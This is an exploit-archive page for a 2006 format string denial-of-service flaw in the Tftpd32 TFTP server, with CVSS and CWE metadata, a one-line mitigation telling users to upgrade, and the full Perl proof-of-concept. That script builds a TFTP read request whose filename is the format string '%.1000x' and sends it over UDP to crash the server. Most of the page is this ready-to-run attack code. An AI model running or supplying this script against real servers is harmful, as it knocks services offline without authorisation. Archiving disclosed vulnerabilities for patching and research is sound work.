header-logo
Suggest Exploit
vendor:
Tftpd32
by:
Critical Security research
7.5
CVSS
HIGH
Format String Vulnerability
134
CWE
Product Name: Tftpd32
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Tftpd32 Format String PoC DoS

This exploit is a proof-of-concept denial of service attack against Tftpd32. It sends a specially crafted packet containing a format string to the server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of Tftpd32, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "\x00\x01" ;   #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);

# milw0rm.com [2006-01-19]

Navigation

Suggest Exploit

Services By CQR